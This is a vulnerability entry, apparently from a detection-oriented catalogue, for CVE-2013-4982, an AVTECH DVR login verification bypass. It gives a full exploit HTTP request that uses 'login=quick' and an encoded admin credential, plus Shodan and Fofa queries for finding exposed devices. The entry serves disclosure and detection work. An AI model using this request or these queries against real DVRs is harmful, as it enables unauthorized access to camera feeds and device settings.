🔙 목록으로 돌아가기

CVE-2013-4982: AVTECH DVR - Login Verification Code Bypass

TitleAVTECH DVR - Login Verification Code Bypass
Authorritikchaddha
SeverityLow
ImpactAttackers can bypass authentication mechanisms and gain unauthorized access to the DVR system, potentially viewing camera feeds, modifying settings, or compromising the device.
RemediationUpdate to the latest firmware version or contact the vendor for a security patch.
CVSS Score5.0
EPSS Score0.39617
CVE IDCVE-2013-4982
CWE IDCWE-287
Shodan Querytitle:"login" product:"Avtech"
Fofa Queryapp="AVTECH-视频监控"
Tags cve cve2013 avtech verify bypass iot vuln

🔍 Vulnerability Description

AVTECH DVR products are vulnerable to verification code bypass just by entering the “login=quick” parameter to bypass verification code.

🌐 HTTP Request

GET /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46bGludXgzMjE=&login=quick HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Connection: close

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-4982.yaml

🦈 Packet Capture: ⬇️ Download cve-2013-4982.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A